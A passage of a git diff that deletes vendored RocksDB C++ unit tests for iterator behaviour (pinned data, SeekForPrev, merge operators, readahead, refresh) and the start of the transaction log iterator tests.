-    auto iter = db_->NewIterator(ro);
-
-    {
-      // Test Seek to random keys
-      std::vector<Slice> keys_slices;
-      std::vector<std::string> true_keys;
-      for (auto& k : random_keys) {
-        iter->Seek(k);
-        if (!iter->Valid()) {
-          ASSERT_EQ(true_data.lower_bound(k), true_data.end());
-          continue;
-        }
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        keys_slices.push_back(iter->key());
-        true_keys.push_back(true_data.lower_bound(k)->first);
-      }
-
-      for (size_t i = 0; i < keys_slices.size(); i++) {
-        ASSERT_EQ(keys_slices[i].ToString(), true_keys[i]);
-      }
-    }
-
-    {
-      // Test SeekForPrev to random keys
-      std::vector<Slice> keys_slices;
-      std::vector<std::string> true_keys;
-      for (auto& k : random_keys) {
-        iter->SeekForPrev(k);
-        if (!iter->Valid()) {
-          ASSERT_EQ(true_data.upper_bound(k), true_data.begin());
-          continue;
-        }
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        keys_slices.push_back(iter->key());
-        true_keys.push_back((--true_data.upper_bound(k))->first);
-      }
-
-      for (size_t i = 0; i < keys_slices.size(); i++) {
-        ASSERT_EQ(keys_slices[i].ToString(), true_keys[i]);
-      }
-    }
-
-    {
-      // Test iterating all data forward
-      std::vector<Slice> all_keys;
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        all_keys.push_back(iter->key());
-      }
-      ASSERT_EQ(all_keys.size(), true_data.size());
-
-      // Verify that all keys slices are valid
-      auto data_iter = true_data.begin();
-      for (size_t i = 0; i < all_keys.size(); i++) {
-        ASSERT_EQ(all_keys[i].ToString(), data_iter->first);
-        data_iter++;
-      }
-    }
-
-    {
-      // Test iterating all data backward
-      std::vector<Slice> all_keys;
-      for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-        std::string prop_value;
-        ASSERT_OK(
-            iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-        ASSERT_EQ("1", prop_value);
-        all_keys.push_back(iter->key());
-      }
-      ASSERT_EQ(all_keys.size(), true_data.size());
-
-      // Verify that all keys slices are valid (backward)
-      auto data_iter = true_data.rbegin();
-      for (size_t i = 0; i < all_keys.size(); i++) {
-        ASSERT_EQ(all_keys[i].ToString(), data_iter->first);
-        data_iter++;
-      }
-    }
-
-    delete iter;
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBIteratorTest, PinnedDataIteratorMultipleFiles) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.use_delta_encoding = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 1024 * 1024 * 10;  // 10 Mb
-  DestroyAndReopen(options);
-
-  std::map<std::string, std::string> true_data;
-
-  // Generate 4 sst files in L2
-  Random rnd(301);
-  for (int i = 1; i <= 1000; i++) {
-    std::string k = Key(i * 3);
-    std::string v = RandomString(&rnd, 100);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-    if (i % 250 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-  ASSERT_EQ(FilesPerLevel(0), "4");
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ(FilesPerLevel(0), "0,4");
-
-  // Generate 4 sst files in L0
-  for (int i = 1; i <= 1000; i++) {
-    std::string k = Key(i * 2);
-    std::string v = RandomString(&rnd, 100);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-    if (i % 250 == 0) {
-      ASSERT_OK(Flush());
-    }
-  }
-  ASSERT_EQ(FilesPerLevel(0), "4,4");
-
-  // Add some keys/values in memtables
-  for (int i = 1; i <= 1000; i++) {
-    std::string k = Key(i);
-    std::string v = RandomString(&rnd, 100);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-  }
-  ASSERT_EQ(FilesPerLevel(0), "4,4");
-
-  ReadOptions ro;
-  ro.pin_data = true;
-  auto iter = db_->NewIterator(ro);
-
-  std::vector<std::pair<Slice, std::string>> results;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("1", prop_value);
-    results.emplace_back(iter->key(), iter->value().ToString());
-  }
-
-  ASSERT_EQ(results.size(), true_data.size());
-  auto data_iter = true_data.begin();
-  for (size_t i = 0; i < results.size(); i++, data_iter++) {
-    auto& kv = results[i];
-    ASSERT_EQ(kv.first, data_iter->first);
-    ASSERT_EQ(kv.second, data_iter->second);
-  }
-
-  delete iter;
-}
-#endif
-
-TEST_F(DBIteratorTest, PinnedDataIteratorMergeOperator) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.use_delta_encoding = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  DestroyAndReopen(options);
-
-  std::string numbers[7];
-  for (int val = 0; val <= 6; val++) {
-    PutFixed64(numbers + val, val);
-  }
-
-  // +1 all keys in range [ 0 => 999]
-  for (int i = 0; i < 1000; i++) {
-    WriteOptions wo;
-    ASSERT_OK(db_->Merge(wo, Key(i), numbers[1]));
-  }
-
-  // +2 all keys divisible by 2 in range [ 0 => 999]
-  for (int i = 0; i < 1000; i += 2) {
-    WriteOptions wo;
-    ASSERT_OK(db_->Merge(wo, Key(i), numbers[2]));
-  }
-
-  // +3 all keys divisible by 5 in range [ 0 => 999]
-  for (int i = 0; i < 1000; i += 5) {
-    WriteOptions wo;
-    ASSERT_OK(db_->Merge(wo, Key(i), numbers[3]));
-  }
-
-  ReadOptions ro;
-  ro.pin_data = true;
-  auto iter = db_->NewIterator(ro);
-
-  std::vector<std::pair<Slice, std::string>> results;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("1", prop_value);
-    results.emplace_back(iter->key(), iter->value().ToString());
-  }
-
-  ASSERT_EQ(results.size(), 1000);
-  for (size_t i = 0; i < results.size(); i++) {
-    auto& kv = results[i];
-    ASSERT_EQ(kv.first, Key(static_cast<int>(i)));
-    int expected_val = 1;
-    if (i % 2 == 0) {
-      expected_val += 2;
-    }
-    if (i % 5 == 0) {
-      expected_val += 3;
-    }
-    ASSERT_EQ(kv.second, numbers[expected_val]);
-  }
-
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, PinnedDataIteratorReadAfterUpdate) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.use_delta_encoding = false;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.write_buffer_size = 100000;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-
-  std::map<std::string, std::string> true_data;
-  for (int i = 0; i < 1000; i++) {
-    std::string k = RandomString(&rnd, 10);
-    std::string v = RandomString(&rnd, 1000);
-    ASSERT_OK(Put(k, v));
-    true_data[k] = v;
-  }
-
-  ReadOptions ro;
-  ro.pin_data = true;
-  auto iter = db_->NewIterator(ro);
-
-  // Delete 50% of the keys and update the other 50%
-  for (auto& kv : true_data) {
-    if (rnd.OneIn(2)) {
-      ASSERT_OK(Delete(kv.first));
-    } else {
-      std::string new_val = RandomString(&rnd, 1000);
-      ASSERT_OK(Put(kv.first, new_val));
-    }
-  }
-
-  std::vector<std::pair<Slice, std::string>> results;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string prop_value;
-    ASSERT_OK(iter->GetProperty("rocksdb.iterator.is-key-pinned", &prop_value));
-    ASSERT_EQ("1", prop_value);
-    results.emplace_back(iter->key(), iter->value().ToString());
-  }
-
-  auto data_iter = true_data.begin();
-  for (size_t i = 0; i < results.size(); i++, data_iter++) {
-    auto& kv = results[i];
-    ASSERT_EQ(kv.first, data_iter->first);
-    ASSERT_EQ(kv.second, data_iter->second);
-  }
-
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterSeekForPrevCrossingFiles) {
-  Options options = CurrentOptions();
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-  options.disable_auto_compactions = true;
-  // Enable prefix bloom for SST files
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("a1", "va1"));
-  ASSERT_OK(Put("a2", "va2"));
-  ASSERT_OK(Put("a3", "va3"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put("b1", "vb1"));
-  ASSERT_OK(Put("b2", "vb2"));
-  ASSERT_OK(Put("b3", "vb3"));
-  ASSERT_OK(Flush());
-
-  ASSERT_OK(Put("b4", "vb4"));
-  ASSERT_OK(Put("d1", "vd1"));
-  ASSERT_OK(Put("d2", "vd2"));
-  ASSERT_OK(Put("d4", "vd4"));
-  ASSERT_OK(Flush());
-
-  MoveFilesToLevel(1);
-  {
-    ReadOptions ro;
-    Iterator* iter = db_->NewIterator(ro);
-
-    iter->SeekForPrev("a4");
-    ASSERT_EQ(iter->key().ToString(), "a3");
-    ASSERT_EQ(iter->value().ToString(), "va3");
-
-    iter->SeekForPrev("c2");
-    ASSERT_EQ(iter->key().ToString(), "b3");
-    iter->SeekForPrev("d3");
-    ASSERT_EQ(iter->key().ToString(), "d2");
-    iter->SeekForPrev("b5");
-    ASSERT_EQ(iter->key().ToString(), "b4");
-    delete iter;
-  }
-
-  {
-    ReadOptions ro;
-    ro.prefix_same_as_start = true;
-    Iterator* iter = db_->NewIterator(ro);
-    iter->SeekForPrev("c2");
-    ASSERT_TRUE(!iter->Valid());
-    delete iter;
-  }
-}
-
-TEST_F(DBIteratorTest, IterPrevKeyCrossingBlocks) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1;  // every block will contain one entry
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.merge_operator = MergeOperators::CreateStringAppendTESTOperator();
-  options.disable_auto_compactions = true;
-  options.max_sequential_skip_in_iterations = 8;
-
-  DestroyAndReopen(options);
-
-  // Putting such deletes will force DBIter::Prev() to fallback to a Seek
-  for (int file_num = 0; file_num < 10; file_num++) {
-    ASSERT_OK(Delete("key4"));
-    ASSERT_OK(Flush());
-  }
-
-  // First File containing 5 blocks of puts
-  ASSERT_OK(Put("key1", "val1.0"));
-  ASSERT_OK(Put("key2", "val2.0"));
-  ASSERT_OK(Put("key3", "val3.0"));
-  ASSERT_OK(Put("key4", "val4.0"));
-  ASSERT_OK(Put("key5", "val5.0"));
-  ASSERT_OK(Flush());
-
-  // Second file containing 9 blocks of merge operands
-  ASSERT_OK(db_->Merge(WriteOptions(), "key1", "val1.1"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key1", "val1.2"));
-
-  ASSERT_OK(db_->Merge(WriteOptions(), "key2", "val2.1"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key2", "val2.2"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key2", "val2.3"));
-
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.1"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.2"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.3"));
-  ASSERT_OK(db_->Merge(WriteOptions(), "key3", "val3.4"));
-  ASSERT_OK(Flush());
-
-  {
-    ReadOptions ro;
-    ro.fill_cache = false;
-    Iterator* iter = db_->NewIterator(ro);
-
-    iter->SeekToLast();
-    ASSERT_EQ(iter->key().ToString(), "key5");
-    ASSERT_EQ(iter->value().ToString(), "val5.0");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key4");
-    ASSERT_EQ(iter->value().ToString(), "val4.0");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key3");
-    ASSERT_EQ(iter->value().ToString(), "val3.0,val3.1,val3.2,val3.3,val3.4");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key2");
-    ASSERT_EQ(iter->value().ToString(), "val2.0,val2.1,val2.2,val2.3");
-
-    iter->Prev();
-    ASSERT_EQ(iter->key().ToString(), "key1");
-    ASSERT_EQ(iter->value().ToString(), "val1.0,val1.1,val1.2");
-
-    delete iter;
-  }
-}
-
-TEST_F(DBIteratorTest, IterPrevKeyCrossingBlocksRandomized) {
-  Options options = CurrentOptions();
-  options.merge_operator = MergeOperators::CreateStringAppendTESTOperator();
-  options.disable_auto_compactions = true;
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.max_sequential_skip_in_iterations = 8;
-  DestroyAndReopen(options);
-
-  const int kNumKeys = 500;
-  // Small number of merge operands to make sure that DBIter::Prev() dont
-  // fall back to Seek()
-  const int kNumMergeOperands = 3;
-  // Use value size that will make sure that every block contain 1 key
-  const int kValSize =
-      static_cast<int>(BlockBasedTableOptions().block_size) * 4;
-  // Percentage of keys that wont get merge operations
-  const int kNoMergeOpPercentage = 20;
-  // Percentage of keys that will be deleted
-  const int kDeletePercentage = 10;
-
-  // For half of the key range we will write multiple deletes first to
-  // force DBIter::Prev() to fall back to Seek()
-  for (int file_num = 0; file_num < 10; file_num++) {
-    for (int i = 0; i < kNumKeys; i += 2) {
-      ASSERT_OK(Delete(Key(i)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  Random rnd(301);
-  std::map<std::string, std::string> true_data;
-  std::string gen_key;
-  std::string gen_val;
-
-  for (int i = 0; i < kNumKeys; i++) {
-    gen_key = Key(i);
-    gen_val = RandomString(&rnd, kValSize);
-
-    ASSERT_OK(Put(gen_key, gen_val));
-    true_data[gen_key] = gen_val;
-  }
-  ASSERT_OK(Flush());
-
-  // Separate values and merge operands in different file so that we
-  // make sure that we dont merge them while flushing but actually
-  // merge them in the read path
-  for (int i = 0; i < kNumKeys; i++) {
-    if (rnd.OneIn(static_cast<int>(100.0 / kNoMergeOpPercentage))) {
-      // Dont give merge operations for some keys
-      continue;
-    }
-
-    for (int j = 0; j < kNumMergeOperands; j++) {
-      gen_key = Key(i);
-      gen_val = RandomString(&rnd, kValSize);
-
-      ASSERT_OK(db_->Merge(WriteOptions(), gen_key, gen_val));
-      true_data[gen_key] += "," + gen_val;
-    }
-  }
-  ASSERT_OK(Flush());
-
-  for (int i = 0; i < kNumKeys; i++) {
-    if (rnd.OneIn(static_cast<int>(100.0 / kDeletePercentage))) {
-      gen_key = Key(i);
-
-      ASSERT_OK(Delete(gen_key));
-      true_data.erase(gen_key);
-    }
-  }
-  ASSERT_OK(Flush());
-
-  {
-    ReadOptions ro;
-    ro.fill_cache = false;
-    Iterator* iter = db_->NewIterator(ro);
-    auto data_iter = true_data.rbegin();
-
-    for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      data_iter++;
-    }
-    ASSERT_EQ(data_iter, true_data.rend());
-
-    delete iter;
-  }
-
-  {
-    ReadOptions ro;
-    ro.fill_cache = false;
-    Iterator* iter = db_->NewIterator(ro);
-    auto data_iter = true_data.rbegin();
-
-    int entries_right = 0;
-    std::string seek_key;
-    for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-      // Verify key/value of current position
-      ASSERT_EQ(iter->key().ToString(), data_iter->first);
-      ASSERT_EQ(iter->value().ToString(), data_iter->second);
-
-      bool restore_position_with_seek = rnd.Uniform(2);
-      if (restore_position_with_seek) {
-        seek_key = iter->key().ToString();
-      }
-
-      // Do some Next() operations the restore the iterator to orignal position
-      int next_count =
-          entries_right > 0 ? rnd.Uniform(std::min(entries_right, 10)) : 0;
-      for (int i = 0; i < next_count; i++) {
-        iter->Next();
-        data_iter--;
-
-        ASSERT_EQ(iter->key().ToString(), data_iter->first);
-        ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      }
-
-      if (restore_position_with_seek) {
-        // Restore orignal position using Seek()
-        iter->Seek(seek_key);
-        for (int i = 0; i < next_count; i++) {
-          data_iter++;
-        }
-
-        ASSERT_EQ(iter->key().ToString(), data_iter->first);
-        ASSERT_EQ(iter->value().ToString(), data_iter->second);
-      } else {
-        // Restore original position using Prev()
-        for (int i = 0; i < next_count; i++) {
-          iter->Prev();
-          data_iter++;
-
-          ASSERT_EQ(iter->key().ToString(), data_iter->first);
-          ASSERT_EQ(iter->value().ToString(), data_iter->second);
-        }
-      }
-
-      entries_right++;
-      data_iter++;
-    }
-    ASSERT_EQ(data_iter, true_data.rend());
-
-    delete iter;
-  }
-}
-
-TEST_F(DBIteratorTest, IteratorWithLocalStatistics) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  for (int i = 0; i < 1000; i++) {
-    // Key 10 bytes / Value 10 bytes
-    ASSERT_OK(Put(RandomString(&rnd, 10), RandomString(&rnd, 10)));
-  }
-
-  std::atomic<uint64_t> total_next(0);
-  std::atomic<uint64_t> total_next_found(0);
-  std::atomic<uint64_t> total_prev(0);
-  std::atomic<uint64_t> total_prev_found(0);
-  std::atomic<uint64_t> total_bytes(0);
-
-  std::vector<port::Thread> threads;
-  std::function<void()> reader_func_next = [&]() {
-    SetPerfLevel(kEnableCount);
-    get_perf_context()->Reset();
-    Iterator* iter = db_->NewIterator(ReadOptions());
-
-    iter->SeekToFirst();
-    // Seek will bump ITER_BYTES_READ
-    uint64_t bytes = 0;
-    bytes += iter->key().size();
-    bytes += iter->value().size();
-    while (true) {
-      iter->Next();
-      total_next++;
-
-      if (!iter->Valid()) {
-        break;
-      }
-      total_next_found++;
-      bytes += iter->key().size();
-      bytes += iter->value().size();
-    }
-
-    delete iter;
-    ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes);
-    SetPerfLevel(kDisable);
-    total_bytes += bytes;
-  };
-
-  std::function<void()> reader_func_prev = [&]() {
-    SetPerfLevel(kEnableCount);
-    Iterator* iter = db_->NewIterator(ReadOptions());
-
-    iter->SeekToLast();
-    // Seek will bump ITER_BYTES_READ
-    uint64_t bytes = 0;
-    bytes += iter->key().size();
-    bytes += iter->value().size();
-    while (true) {
-      iter->Prev();
-      total_prev++;
-
-      if (!iter->Valid()) {
-        break;
-      }
-      total_prev_found++;
-      bytes += iter->key().size();
-      bytes += iter->value().size();
-    }
-
-    delete iter;
-    ASSERT_EQ(bytes, get_perf_context()->iter_read_bytes);
-    SetPerfLevel(kDisable);
-    total_bytes += bytes;
-  };
-
-  for (int i = 0; i < 10; i++) {
-    threads.emplace_back(reader_func_next);
-  }
-  for (int i = 0; i < 15; i++) {
-    threads.emplace_back(reader_func_prev);
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_NEXT), (uint64_t)total_next);
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_NEXT_FOUND),
-            (uint64_t)total_next_found);
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_PREV), (uint64_t)total_prev);
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_DB_PREV_FOUND),
-            (uint64_t)total_prev_found);
-  ASSERT_EQ(TestGetTickerCount(options, ITER_BYTES_READ), (uint64_t)total_bytes);
-
-}
-
-TEST_F(DBIteratorTest, ReadAhead) {
-  Options options;
-  env_->count_random_reads_ = true;
-  options.env = env_;
-  options.disable_auto_compactions = true;
-  options.write_buffer_size = 4 << 20;
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  table_options.no_block_cache = true;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-  Reopen(options);
-
-  std::string value(1024, 'a');
-  for (int i = 0; i < 100; i++) {
-    Put(Key(i), value);
-  }
-  ASSERT_OK(Flush());
-  MoveFilesToLevel(2);
-
-  for (int i = 0; i < 100; i++) {
-    Put(Key(i), value);
-  }
-  ASSERT_OK(Flush());
-  MoveFilesToLevel(1);
-
-  for (int i = 0; i < 100; i++) {
-    Put(Key(i), value);
-  }
-  ASSERT_OK(Flush());
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("1,1,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-
-  env_->random_read_bytes_counter_ = 0;
-  options.statistics->setTickerCount(NO_FILE_OPENS, 0);
-  ReadOptions read_options;
-  auto* iter = db_->NewIterator(read_options);
-  iter->SeekToFirst();
-  int64_t num_file_opens = TestGetTickerCount(options, NO_FILE_OPENS);
-  size_t bytes_read = env_->random_read_bytes_counter_;
-  delete iter;
-
-  env_->random_read_bytes_counter_ = 0;
-  options.statistics->setTickerCount(NO_FILE_OPENS, 0);
-  read_options.readahead_size = 1024 * 10;
-  iter = db_->NewIterator(read_options);
-  iter->SeekToFirst();
-  int64_t num_file_opens_readahead = TestGetTickerCount(options, NO_FILE_OPENS);
-  size_t bytes_read_readahead = env_->random_read_bytes_counter_;
-  delete iter;
-  ASSERT_EQ(num_file_opens + 3, num_file_opens_readahead);
-  ASSERT_GT(bytes_read_readahead, bytes_read);
-  ASSERT_GT(bytes_read_readahead, read_options.readahead_size * 3);
-
-  // Verify correctness.
-  iter = db_->NewIterator(read_options);
-  int count = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    ASSERT_EQ(value, iter->value());
-    count++;
-  }
-  ASSERT_EQ(100, count);
-  for (int i = 0; i < 100; i++) {
-    iter->Seek(Key(i));
-    ASSERT_EQ(value, iter->value());
-  }
-  delete iter;
-}
-
-// Insert a key, create a snapshot iterator, overwrite key lots of times,
-// seek to a smaller key. Expect DBIter to fall back to a seek instead of
-// going through all the overwrites linearly.
-TEST_F(DBIteratorTest, DBIteratorSkipRecentDuplicatesTest) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.max_sequential_skip_in_iterations = 3;
-  options.prefix_extractor = nullptr;
-  options.write_buffer_size = 1 << 27;  // big enough to avoid flush
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  // Insert.
-  ASSERT_OK(Put("b", "0"));
-
-  // Create iterator.
-  ReadOptions ro;
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-  // Insert a lot.
-  for (int i = 0; i < 100; ++i) {
-    ASSERT_OK(Put("b", std::to_string(i + 1).c_str()));
-  }
-
-#ifndef ROCKSDB_LITE
-  // Check that memtable wasn't flushed.
-  std::string val;
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level0", &val));
-  EXPECT_EQ("0", val);
-#endif
-
-  // Seek iterator to a smaller key.
-  get_perf_context()->Reset();
-  iter->Seek("a");
-  ASSERT_TRUE(iter->Valid());
-  EXPECT_EQ("b", iter->key().ToString());
-  EXPECT_EQ("0", iter->value().ToString());
-
-  // Check that the seek didn't do too much work.
-  // Checks are not tight, just make sure that everything is well below 100.
-  EXPECT_LT(get_perf_context()->internal_key_skipped_count, 4);
-  EXPECT_LT(get_perf_context()->internal_recent_skipped_count, 8);
-  EXPECT_LT(get_perf_context()->seek_on_memtable_count, 10);
-  EXPECT_LT(get_perf_context()->next_on_memtable_count, 10);
-  EXPECT_LT(get_perf_context()->prev_on_memtable_count, 10);
-
-  // Check that iterator did something like what we expect.
-  EXPECT_EQ(get_perf_context()->internal_delete_skipped_count, 0);
-  EXPECT_EQ(get_perf_context()->internal_merge_count, 0);
-  EXPECT_GE(get_perf_context()->internal_recent_skipped_count, 2);
-  EXPECT_GE(get_perf_context()->seek_on_memtable_count, 2);
-  EXPECT_EQ(1, options.statistics->getTickerCount(
-                 NUMBER_OF_RESEEKS_IN_ITERATION));
-}
-
-TEST_F(DBIteratorTest, Refresh) {
-  ASSERT_OK(Put("x", "y"));
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  ASSERT_OK(Put("c", "d"));
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Refresh();
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("c")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  dbfull()->Flush(FlushOptions());
-
-  ASSERT_OK(Put("m", "n"));
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("c")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter->Refresh();
-
-  iter->Seek(Slice("a"));
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("c")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("m")), 0);
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("x")), 0);
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-
-  iter.reset();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_log_iter_test.cc b/thirdparty/rocksdb/db/db_log_iter_test.cc
deleted file mode 100644
index e7f94c4..0000000
--- a/thirdparty/rocksdb/db/db_log_iter_test.cc
+++ /dev/null
@@ -1,294 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#if !defined(ROCKSDB_LITE)
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-
-class DBTestXactLogIterator : public DBTestBase {
- public:
-  DBTestXactLogIterator() : DBTestBase("/db_log_iter_test") {}
-
-  std::unique_ptr<TransactionLogIterator> OpenTransactionLogIter(
-      const SequenceNumber seq) {
-    unique_ptr<TransactionLogIterator> iter;
-    Status status = dbfull()->GetUpdatesSince(seq, &iter);
-    EXPECT_OK(status);
-    EXPECT_TRUE(iter->Valid());
-    return iter;
-  }
-};
-
-namespace {
-SequenceNumber ReadRecords(
-    std::unique_ptr<TransactionLogIterator>& iter,
-    int& count) {
-  count = 0;
-  SequenceNumber lastSequence = 0;
-  BatchResult res;
-  while (iter->Valid()) {
-    res = iter->GetBatch();
-    EXPECT_TRUE(res.sequence > lastSequence);
-    ++count;
-    lastSequence = res.sequence;
-    EXPECT_OK(iter->status());
-    iter->Next();
-  }
-  return res.sequence;
-}
-
-void ExpectRecords(
-    const int expected_no_records,
-    std::unique_ptr<TransactionLogIterator>& iter) {
-  int num_records;
-  ReadRecords(iter, num_records);
-  ASSERT_EQ(num_records, expected_no_records);
-}
-}  // namespace
-
-TEST_F(DBTestXactLogIterator, TransactionLogIterator) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    Put(0, "key1", DummyString(1024));
-    Put(1, "key2", DummyString(1024));
-    Put(1, "key2", DummyString(1024));
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3U);
-    {
-      auto iter = OpenTransactionLogIter(0);
-      ExpectRecords(3, iter);
-    }
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    env_->SleepForMicroseconds(2 * 1000 * 1000);
-    {
-      Put(0, "key4", DummyString(1024));
-      Put(1, "key5", DummyString(1024));
-      Put(0, "key6", DummyString(1024));
-    }
-    {
-      auto iter = OpenTransactionLogIter(0);
-      ExpectRecords(6, iter);
-    }
-  } while (ChangeCompactOptions());
-}
-
-#ifndef NDEBUG  // sync point is not included with DNDEBUG build
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorRace) {
-  static const int LOG_ITERATOR_RACE_TEST_COUNT = 2;
-  static const char* sync_points[LOG_ITERATOR_RACE_TEST_COUNT][4] = {
-      {"WalManager::GetSortedWalFiles:1",  "WalManager::PurgeObsoleteFiles:1",
-       "WalManager::PurgeObsoleteFiles:2", "WalManager::GetSortedWalFiles:2"},
-      {"WalManager::GetSortedWalsOfType:1",
-       "WalManager::PurgeObsoleteFiles:1",
-       "WalManager::PurgeObsoleteFiles:2",
-       "WalManager::GetSortedWalsOfType:2"}};
